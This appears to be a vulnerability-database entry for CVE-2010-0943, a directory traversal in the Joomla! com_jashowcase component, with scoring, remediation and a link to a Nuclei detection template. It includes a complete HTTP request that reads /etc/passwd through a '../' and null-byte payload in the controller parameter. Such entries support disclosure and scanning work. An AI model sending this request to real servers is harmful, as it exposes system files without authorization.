| Title | Joomla! Component com_jashowcase - Directory Traversal |
|---|---|
| Author | daffainfo |
| Severity | Medium |
| Impact | An attacker can exploit this vulnerability to read arbitrary files on the server. |
| Remediation | Update to the latest version of Joomla! Component com_jashowcase to fix the directory traversal vulnerability. |
| CVSS Score | 5 |
| EPSS Score | 0.14795 |
| CVE ID | CVE-2010-0943 |
| CWE ID | CWE-22 |
| Tags | cve cve2010 joomla lfi edb joomlart vuln |
A directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.
GET /index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Mobile/15E148 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2010/CVE-2010-0943.yaml
🦈 Packet Capture: ⬇️ Download cve-2010-0943.pcap
N/AN/A